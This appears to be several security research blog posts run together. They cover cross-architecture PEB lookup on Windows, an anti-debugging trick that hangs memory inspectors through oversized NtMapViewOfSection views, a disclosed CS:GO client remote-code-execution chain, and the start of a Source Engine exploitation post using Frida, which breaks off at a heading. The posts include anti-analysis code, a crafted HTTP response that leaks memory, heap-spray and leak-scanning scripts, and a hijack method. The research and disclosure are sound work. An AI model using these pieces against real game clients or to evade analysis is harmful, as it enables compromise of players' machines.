The problem at hand

As it turns out, the best documented method, NtQueryInformationProcess(ProcessBasicInformation), can only acquire the address of the PEB whose architecture is the same as your own process's. As you can guess, if the architectures do not match, the address you get is quite useless when trying to enumerate loaded modules. To solve the problem, one has to use different combinations of flags and APIs to get the correct structure.

Implementation

To cut to the chase, here is a table of exactly what needs to be used to correctly acquire the PEB according to the architecture of your own and the target process.

Target   Local    Function
same     same     NtQueryInformationProcess(ProcessBasicInformation)
32 bit   64 bit   NtQueryInformationProcess(ProcessWow64Information)
64 bit   32 bit   NtWow64QueryInformationProcess64(ProcessBasicInformation)

The first step is to figure out whether our process is of the same architecture as the target. Coincidentally, that can be done by reusing the output of the same native API that returns the address of the PEB.

// acquire the PROCESS_EXTENDED_BASIC_INFORMATION of target process
PROCESS_EXTENDED_BASIC_INFORMATION info;
info.Size = sizeof(info);
NtQueryInformationProcess(
  handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

// function to check whether the arch is the same
bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

And in the case where the architectures don't match, we can then choose one of the other two aforementioned APIs.

NTSTATUS remote_peb_diff_arch(void* handle, uint64_t& peb_addr) noexcept
{
#ifdef _WIN64 // we are x64 and target is x32
  return NtQueryInformationProcess(
    handle, ProcessWow64Information, &peb_addr, sizeof(peb_addr), nullptr);
#else // we are x32 and the target is x64
  PROCESS_BASIC_INFORMATION64 pbi;
  const auto status = NtWow64QueryInformationProcess64(
    handle, ProcessBasicInformation, &pbi, sizeof(pbi), nullptr);

  if(NT_SUCCESS(status))
    peb_addr = pbi.PebBaseAddress;
  return status;
#endif
}

Lastly, here is the full, finished code listing:

bool is_process_same_arch(const PROCESS_EXTENDED_BASIC_INFORMATION& info) noexcept
{
  return info.IsWow64Process == !!NtCurrentTeb()->WowTebOffset;
}

NTSTATUS peb_address(void* handle, std::uint64_t& address) noexcept
{
  PROCESS_EXTENDED_BASIC_INFORMATION info;
  info.Size = sizeof(info);
  auto status = NtQueryInformationProcess(
    handle, ProcessBasicInformation, &info, sizeof(info), nullptr);

  if(NT_SUCCESS(status)) {
    if(is_process_same_arch(info))
      address = reinterpret_cast<std::uintptr_t>(info.BasicInfo.PebBaseAddress);
    else
      status = remote_peb_diff_arch(handle, address);
  }

  return status;
}

The next article will explain how to enumerate the loaded modules list.

Preventing memory inspection on Windows

Have you ever wanted your dynamic analysis tool to take as long as GTA V to query memory regions while being impossible to kill and using 100% of the poor CPU core that encountered this? Well, me neither, but the technology is here and it’s quite simple!

What, Where, WTF?

As usual with my anti-debug related posts, everything starts with a little innocuous flag that Microsoft hasn’t documented. Or at least so I thought.

This time the main offender is NtMapViewOfSection, a syscall that can map a section object into the address space of a given process, mainly used for implementing shared memory and memory mapping files (The Win32 API for this would be MapViewOfFile).

NTSTATUS NtMapViewOfSection(
  HANDLE          SectionHandle,
  HANDLE          ProcessHandle,
  PVOID           *BaseAddress,
  ULONG_PTR       ZeroBits,
  SIZE_T          CommitSize,
  PLARGE_INTEGER  SectionOffset,
  PSIZE_T         ViewSize,
  SECTION_INHERIT InheritDisposition,
  ULONG           AllocationType,
  ULONG           Win32Protect);

By doing a little bit of digging around in ntoskrnl’s MiMapViewOfSection and searching in the Windows headers for known constants, we can recover the meaning behind most valid flag values.

/* Valid values for AllocationType */
MEM_RESERVE                0x00002000
SEC_PARTITION_OWNER_HANDLE 0x00040000
MEM_TOPDOWN                0x00100000
SEC_NO_CHANGE              0x00400000
SEC_FILE                   0x00800000
MEM_LARGE_PAGES            0x20000000
SEC_WRITECOMBINE           0x40000000

Initially I failed at ctrl+f and didn’t realize that 0x2000 is a known flag, so I started digging deeper. In the same function we can also discover what the flag does and its main limitations.

// --- MAIN FUNCTIONALITY ---
if (SectionOffset + ViewSize > SectionObject->SizeOfSection &&
    !(AllocationAttributes & 0x2000))
    return STATUS_INVALID_VIEW_SIZE;

// --- LIMITATIONS ---
// Image sections are not allowed
if ((AllocationAttributes & 0x2000) &&
    SectionObject->u.Flags.Image)
    return STATUS_INVALID_PARAMETER;

// Section must have been created with one of these 2 protection values
if ((AllocationAttributes & 0x2000) &&
    !(SectionObject->InitialPageProtection & (PAGE_READWRITE | PAGE_EXECUTE_READWRITE)))
    return STATUS_SECTION_PROTECTION;

// Physical memory sections are not allowed
if ((Params->AllocationAttributes & 0x20002000) &&
    SectionObject->u.Flags.PhysicalMemory)
    return STATUS_INVALID_PARAMETER;

Now, this sounds like a bog standard MEM_RESERVE and it’s possible to VirtualAlloc(MEM_RESERVE) whatever you want as well, however APIs that interact with this memory do treat it differently.

How differently you may ask? Well, after incorrectly identifying the flag as undocumented, I went ahead and attempted to create the biggest section I possibly could. Everything went well until I opened the ProcessHacker memory view. The PC was nigh unusable for at least a minute and after that process hacker remained unresponsive for a while as well. Subsequent runs didn’t seem to seize up the whole system however it still took up to 4 minutes for the NtQueryVirtualMemory call to return.

I guess you could call this a happy little accident as Bob Ross would say.

The cause

Since I’m lazy, instead of diving in and reversing, I decided to use Windows Performance Recorder. It’s a nifty tool that uses ETW tracing to give you a lot of insight into what was happening on the system. The recorded trace can then be viewed in Windows Performance Analyzer.

Trace Viewed in Windows Performance Analyzer

This doesn’t say too much, but at least we know where to look.

After spending some more time staring at the code in everyone’s favourite decompiler it became a bit more clear what’s happening. I’d bet that it’s iterating through every single page table entry for the given memory range. And because we’re dealing with terabytes of of data at a time it’s over a billion iterations. (MiQueryAddressState is a large function, and I didn’t think a short pseudocode snippet would do it justice)

This is also reinforced by the fact that from my testing the relation between view size and time taken is completely linear. To further verify this idea we can also do some quick napkin math to see if it all adds up:

instructions per second (ips) = 3.8Ghz * ~8
page table entries      (n)   = 12TB / 4096
time taken              (t)   = 3.5 minutes

instruction per page table entry = ips * t / n = ~2000

In my opinion, this number looks rather believable so, with everything added up, I’ll roll with the current idea.

Minimal Example

// file handle must be a handle to a non empty file
void* section = nullptr;
auto  status  = NtCreateSection(&section,
                                MAXIMUM_ALLOWED,
                                nullptr,
                                nullptr,
                                PAGE_EXECUTE_READWRITE,
                                SEC_COMMIT,
                                file_handle);
if (!NT_SUCCESS(status))
    return status;

// Personally, the largest I could get the section was 12TB, but I'm sure people with more
// memory could get it larger.
void* base = nullptr;
for (size_t i = 46;  i > 38; --i) {
    SIZE_T view_size = (1ull << i);
    status           = NtMapViewOfSection(section,
                                          NtCurrentProcess(),
                                          &base,
                                          0,
                                          0x1000,
                                          nullptr,
                                          &view_size,
                                          ViewUnmap,
                                          0x2000, // <- the flag
                                          PAGE_EXECUTE_READWRITE);

    if (NT_SUCCESS(status))
        break;
}

Do note that, ideally, you'd want to surround your code with these sections, because only the reserved portions of these sections cause the slowdown. Furthermore, transactions could also be a solution for needing a non-empty file, without touching anything already existing or creating something visible to the user.

Conclusion

I think this is a great and powerful technique to mess with people analyzing your code. The resource usage is reasonable, all it takes to set it up is a few syscalls, and it’s unlikely to get accidentally triggered.

Counter-Strike Global Offsets: reliable remote code execution

One of the factors contributing to Counter-Strike Global Offensive’s (herein “CS:GO”) massive popularity is the ability for anyone to host their own community server. These community servers are free to download and install and allow for a high degree of customization. Server administrators can create and utilize custom assets such as maps, allowing for innovative game modes.

However, this design choice opens up a large attack surface. Players can connect to potentially malicious servers, exchanging complex game messages and binary assets such as textures.

We’ve managed to find and exploit two bugs that, when combined, lead to reliable remote code execution on a player’s machine when connecting to our malicious server. The first bug is an information leak that enabled us to break ASLR in the client’s game process. The second bug is an out-of-bounds access of a global array in the .data section of one of the game’s loaded modules, leading to control over the instruction pointer.

Community server list

Players can join community servers using a user friendly server browser built into the game:

Once the player joins a server, their game client and the community server start talking to each other. As security researchers, it was our task to understand the network protocol used by CS:GO and what kind of messages are sent so that we could look for vulnerabilities.

As it turned out, CS:GO uses its own UDP-based protocol to serialize, compress, fragment, and encrypt data sent between clients and a server. We won’t go into detail about the networking code, as it is irrelevant to the bugs we will present.

More importantly, this custom UDP-based protocol carries Protobuf serialized payloads. Protobuf is a technology developed by Google which allows defining messages and provides an API for serializing and deserializing those messages.

Here is an example of a protobuf message defined and used by the CS:GO developers:

message CSVCMsg_VoiceInit {
	optional int32 quality = 1;
	optional string codec = 2;
	optional int32 version = 3 [default = 0];
}

We found this message definition by doing a Google search after having discovered CS:GO utilizes Protobuf. We came across the SteamDatabase GitHub repository containing a list of Protobuf message definitions.

As the name of the message suggests, it’s used to initialize some kind of voice-message transfer of one player to the server. The message body carries some parameters, such as the codec and version used to interpret the voice data.

Developing a CS:GO proxy

Having this list of messages and their definitions enabled us to gain insights into what kind of data is sent between the client and server. However, we still had no idea in which order messages would be sent and what kind of values were expected. For example, we knew that a message exists to initialize a voice message with some codec, but we had no idea which codecs are supported by CS:GO.

For this reason, we developed a proxy for CS:GO that allowed us to view the communication in real-time. The idea was that we could launch the CS:GO game and connect to any server through the proxy and then dump any messages received by the client and sent to the server. For this, we reverse-engineered the networking code to decrypt and unpack the messages.

We also added the ability to modify the values of any message that would be sent/received. Since an attacker ultimately controls any value in a Protobuf serialized message sent between clients and the server, it becomes a possible attack surface. We could find bugs in the code responsible for initializing a connection without reverse-engineering it by mutating interesting fields in messages.

The following GIF shows how messages are being sent by the game and dumped by the proxy in real-time, corresponding to events such as shooting, changing weapons, or moving:

Equipped with this tooling, it was now time for us to discover bugs by flipping some bits in the protobuf messages.

OOB access in CSVCMsg_SplitScreen

We discovered that a field in the CSVCMsg_SplitScreen message, that can be sent by a (malicious) server to a client, can lead to an OOB access which subsequently leads to a controlled virtual function call.

The definition of this message is:

message CSVCMsg_SplitScreen {
	optional .ESplitScreenMessageType type = 1 [default = MSG_SPLITSCREEN_ADDUSER];
	optional int32 slot = 2;
	optional int32 player_index = 3;
}

CSVCMsg_SplitScreen seemed interesting, as a field called player_index is controlled by the server. However, contrary to intuition, the player_index field is not used to access an array; the slot field is. As it turns out, the slot field is used as an index into the array of splitscreen player objects located in the .data segment of engine.dll, without any bounds checks.

Looking at the crash we could already observe some interesting facts:

  1. The array is stored in the .data section within engine.dll
  2. After accessing the array, an indirect function call on the accessed object occurs

The following screenshot of decompiled code shows how player_slot was used without any checks as an index. If the first byte of the object was not 1, a branch is entered:

The bug proved to be quite promising, as a few instructions into the branch a vtable is dereferenced and a function pointer is called. This is shown in the next screenshot:
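
Putting the two observations together, the vulnerable pattern presumably looks roughly like this; all names here are hypothetical stand-ins for the decompiled code, not actual engine symbols:

struct SplitScreenSlot {
    unsigned char state;              // first byte of the object, compared against 1
    void (**vtable)();                // crude stand-in for the object's vtable
};

// global array of splitscreen player objects in the .data section of engine.dll
SplitScreenSlot* g_splitScreenPlayers[2];

void HandleSplitScreen(int slot)      // 'slot' comes straight from the message
{
    SplitScreenSlot* p = g_splitScreenPlayers[slot];   // no bounds check: OOB read
    if (p->state != 1)
        p->vtable[0]();                                 // indirect call a few instructions later
}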

We were very excited about the bug as it seemed highly exploitable, given an info leak. Since the pointer to an object is obtained from a global array within engine.dll, which at the time of writing is a 6MB binary, we were confident that we could find a pointer to data we control. Pointing the aforementioned object to attacker controlled data would yield arbitrary code execution.

However, we would still have to fake a vtable at a known location and then point the function pointer to something useful. Due to this constraint, we decided to look for another bug that could lead to an info leak.

Uninitialized memory in HTTP downloads leads to information disclosure

As mentioned earlier, server admins can create servers with any number of customizations, including custom maps and sounds. Whenever a player joins a server with such customizations, files behind the customizations need to be transferred. Server admins can create a list of files that need to be downloaded for each map in the server’s playlist.

During the connection phase, the server sends the client the URL of an HTTP server from which the necessary files should be downloaded. For each custom file, a cURL request would be created. Two options that were set for each request piqued our interest: CURLOPT_HEADERFUNCTION and CURLOPT_WRITEFUNCTION. The former allows a callback to be registered that is called for each HTTP header in the HTTP response. The latter allows registering a callback that is triggered whenever body data is received.

The following screenshot shows how these options are set:

We were interested in seeing how Valve developers handled incoming HTTP headers and reverse engineered the function we named CurlHeaderCallback().

It turned out that the CurlHeaderCallback() simply parsed the Content-Length HTTP header and allocated an uninitialized buffer on the heap accordingly, as the Content-Length should correspond to the size of the file that should be downloaded.

The CurlWriteCallback() would then simply write received data to this buffer.

Finally, once the HTTP request finished and no more data was to be received, the buffer would be written to disk.

We immediately noticed a flaw in the parsing of the HTTP header Content-Length: as the following screenshot shows, a case-sensitive compare was made.

Case-sensitive search for the Content-Length header.

This compare is flawed, as HTTP headers can be lowercase as well. This only matters for Linux clients, which use cURL and then perform the compare themselves; on Windows, the client just assumes that the value returned by the Windows API is correct. Either way, the result is the same bug: we can send an arbitrary Content-Length header with a small response body.
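
Based on that behaviour, the header handling presumably looks something like the following sketch; the names and exact parsing are a reconstruction, not Valve's actual code:

#include <cstdlib>
#include <cstring>

struct DownloadState {
    char*  buffer;    // destination for the body data
    size_t size;      // expected file size
};

// CURLOPT_HEADERFUNCTION-style callback: invoked once per response header line.
size_t CurlHeaderCallback(char* line, size_t size, size_t nitems, void* userdata)
{
    DownloadState* dl = (DownloadState*)userdata;

    // Case-sensitive match: a lowercase "content-length" header slips right past this.
    if (!strncmp(line, "Content-Length:", 15)) {
        dl->size   = (size_t)atoll(line + 15);
        dl->buffer = (char*)malloc(dl->size);   // never zeroed: uninitialized heap memory
    }
    return size * nitems;                       // tell cURL to keep processing headers
}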

We set up a HTTP server with a Python script and played around with some HTTP header values. Finally, we came up with a HTTP response that triggers the bug:

HTTP/1.1 200 OK
Content-Type: text/plain
Content-Length: 1337
content-length: 0
Connection: closed

When a client receives such an HTTP response for a file download, it would recognize the first Content-Length header and allocate a buffer of size 1337. However, a second content-length header with size 0 follows. Although the CS:GO code misses this second, lowercase header due to its case-sensitive search and still expects 1337 bytes of body data, cURL uses the last header and finishes the request immediately.

On Windows, the API just returns the first header value even though the response is ill-formed. The CS:GO code then writes the allocated buffer to disk, along with all uninitialized memory contents, including pointers, contained within the buffer.

Although it appears that CS:GO uses the Windows API to handle the HTTP downloads on Windows, the exact same HTTP response worked and allowed us to create files of arbitrary size containing uninitialized memory contents on a player’s machine.

A server can then request these files through the CNETMsg_File message. When a client receives this message, they will upload the requested file to the server. It is defined as follows:

message CNETMsg_File {
	optional int32 transfer_id = 1;
	optional string file_name = 2;
	optional bool is_replay_demo_file = 3;
	optional bool deny = 4;
}

Once the file is uploaded, an attacker controlled server could search the file’s contents to find pointers into engine.dll or heap pointers to break ASLR. We described this step in detail in our appendix section Breaking ASLR.

Putting it all together: ConVars as a gadget

To further enable customization of the game, the server and client exchange ConVars, which are essentially configuration options.

Each ConVar is managed by a global object, stored in engine.dll. The following code snippet shows a simplified definition of such an object which is used to explain why ConVars turned out to be a powerful gadget to help exploit the OOB access:

struct ConVar {
    char *convar_name;
    int data_len;
    void *convar_data;
    int color_value;
};

A community server can update its ConVar values during a match and notify the client by sending the CNETMsg_SetConVar message:

message CMsg_CVars {
	message CVar {
		optional string name = 1;
		optional string value = 2;
		optional uint32 dictionary_name = 3;
	}

	repeated .CMsg_CVars.CVar cvars = 1;
}

message CNETMsg_SetConVar {
	optional .CMsg_CVars convars = 1;
}

These messages consist of a simple key/value structure. When comparing the message definition to the struct ConVar definition, it is correct to assume that the entirely attacker-controllable value field of the CVar message is copied to the client’s heap and a pointer to it is stored in the convar_data field of a ConVar object.

As we previously discussed, the OOB access in CSVCMsg_SplitScreen occurs in an array of pointers to objects. Here is the decompilation of the code in which the OOB access occurs as a reminder:

Since the array and all ConVars are located in the .data section of engine.dll, we can reliably set the player_slot argument such that the ptr_to_object points to a ConVar value which we previously set. This can be illustrated as follows:

We also mentioned earlier that a few instructions after the OOB access a virtual method on the object is called. This happens as usual through a vtable dereference. Here is the code again as a reminder:

Since we control the contents of the object through the ConVar, we can simply set the vtable pointer to any value. In order to make the exploit 100% reliable, it would make sense to use the info leak to point back into the .data section of engine.dll into controlled data.

Luckily, some ConVars are interpreted as color values and expect a 4-byte (Red Green Blue Alpha) value, which can be attacker controlled. This value is stored directly in the color_value field in the above struct ConVar definition. Since the CS:GO process on Windows is 32-bit, we were able to use the color value of a ConVar to fake a pointer.

If we use the fake object’s vtable pointer to point into the .data section of engine.dll, such that the called method overlaps with the color_value, we can finally hijack the EIP register and redirect control flow arbitrarily. This chain of dereferences can be illustrated as follows:
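
Written out as a rough C sketch, the chain looks like this; the struct is the simplified ConVar from above, method_offset stands in for the fixed vtable slot used at the call site, and none of the names are real engine symbols:

#include <cstdint>

struct ConVar {
    char*    convar_name;
    int      data_len;
    char*    convar_data;    // heap copy of the attacker-supplied string value
    uint32_t color_value;    // 4 attacker-controlled bytes for color ConVars
};

ConVar g_stringConVar;       // both objects live in the .data section of engine.dll,
ConVar g_colorConVar;        // just like the splitscreen array

void FakeVirtualCall(size_t method_offset)
{
    // 1. player_slot is chosen so the OOB array read lands on &g_stringConVar.convar_data,
    //    i.e. the "object pointer" is really the attacker's heap string.
    uint8_t* fake_object = (uint8_t*)g_stringConVar.convar_data;

    // 2. The first 4 bytes of that string act as the vtable pointer; the attacker
    //    sets them to &g_colorConVar.color_value minus method_offset ...
    uint8_t* fake_vtable = *(uint8_t**)fake_object;

    // 3. ... so the "method" fetched from the vtable is exactly color_value,
    //    a fully attacker-chosen 32-bit address.
    uintptr_t target = *(uint32_t*)(fake_vtable + method_offset);
    ((void (*)())target)();   // instruction pointer hijacked
}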

ROP chain to RCE

With ASLR broken and us having gained arbitrary instruction pointer control, all that was left to do was build a ROP chain that finally led to us calling ShellExecuteA to execute arbitrary system commands.

Conclusion

We submitted both bugs in one report to Valve’s HackerOne program, along with the exploit we developed that proved 100% reliability. Unfortunately, in over 4 months, we did not even receive an acknowledgment from a Valve representative. After public pressure, when it became apparent that Valve had also ignored other security researchers with similar impact, Valve finally fixed numerous security issues. We hope that Valve re-structures its bug bounty program to attract security researchers again.

Time Table

Date (DD.MM.YYYY) What
04.01.2021 Reported both bugs in one report to Valve’s bug bounty program
11.01.2021 A HackerOne triager verifies the bug and triages it
10.02.2021 First follow-up, no response from Valve
23.02.2021 Second follow-up, no response from Valve
10.04.2021 Disclosure of bug existence via Twitter
15.04.2021 Third follow-up, no response from Valve
28.04.2021 Valve patches both bugs

Breaking ASLR

In the Uninitialized memory in HTTP downloads leads to information disclosure section, we showed how the HTTP download allowed us to view arbitrarily sized chunks of uninitialized memory in a client’s game process.

We discovered another message that seemed quite interesting to us: CSVCMsg_SendTable. Whenever a client received such a message, it would allocate an object of attacker-controlled size on the heap. Most importantly, the first 4 bytes of the object would contain a vtable pointer into engine.dll.

def spray_send_table(s, addr, nprops):
    table = nmsg.CSVCMsg_SendTable()
    table.is_end = False
    table.net_table_name = "abctable"
    table.needs_decoder = False

    for _ in range(nprops):
        prop = table.props.add()
        prop.type = 0x1337ee00
        prop.var_name = "abc"
        prop.flags = 0
        prop.priority = 0
        prop.dt_name = "whatever"
        prop.num_elements = 0
        prop.low_value = 0.0
        prop.high_value = 0.0
        prop.num_bits = 0x00ff00ff

    tosend = prepare_payload(table, 9)
    s.sendto(tosend, addr)

The Windows heap is kind of nondeterministic. That is, a malloc -> free -> malloc combo will not necessarily yield the same block. Thankfully, Saar Amar published his great research about the Windows heap, which we consulted to get a better understanding of our exploit context.

We came up with a spray to allocate many arrays of SendTable objects with markers to scan for when we uploaded the files back to the server. Because we can choose the size of the array, we chose a not-so-commonly allocated size to avoid interference with normal game code. If we now deallocate all of the sprayed arrays at once and then let the client download the files, the chance of one of the files hitting a previously sprayed chunk is relatively high.

In practice, we almost always got the leak in the first file, and when we didn’t, we could simply reset the connection and try again, as we had not corrupted the program state yet. In order to maximize success, we created four files for the exploit. This makes it very likely that at least one of them succeeds; otherwise, we simply try again.

The following code shows how we scanned the received memory for our sprayed object to find the SendTable vtable which will point into engine.dll.

files_received.append(fn)
pp = packetparser.PacketParser(leak_callback)

for i in range(len(data) - 0x54):
    vtable_ptr = struct.unpack('<I', data[i:i+4])[0]
    table_type = struct.unpack('<I', data[i+8:i+12])[0]
    table_nbits = struct.unpack('<I', data[i+12:i+16])[0]
    if table_type == 0x1337ee00 and table_nbits == 0x00ff00ff:
        engine_base = vtable_ptr - OFFSET_VTABLE 
        print(f"vtable_ptr={hex(vtable_ptr)}")
        break

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida

Introduction

Hey guys, it’s been awhile. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through Typescript.

Problems with SourceMod (since the last post)

If you read my last blog post, you knew that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff, making it easy to automatically carry offsets forward as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these type of bugs is to exploit some buffer overflow, build a ROP using the module xinput.dll which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find these on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on if another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice, I feel.

In the case of a server->client exploit, one of these exploits would typically look like:

  • Client connects to server
  • Server exploits stack-based buffer overflow in the client
  • Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
  • Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
  • Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

An option to getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

  • Arbitrary relative pointer writes to pointers in global queryable objects
  • Heap overflows against a queryable object to cause controllable pointer writes
  • Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The value that is sent back is either the integer value of the CVar or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

  • The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
  • The exploit must produce its own pointer leak, or chain another bug to infoleak
  • The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
  • The exploit must have a ~100% stability rate
  • The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the other.

Here’s what I eventually settled on for my chain:

  • Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
  • Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

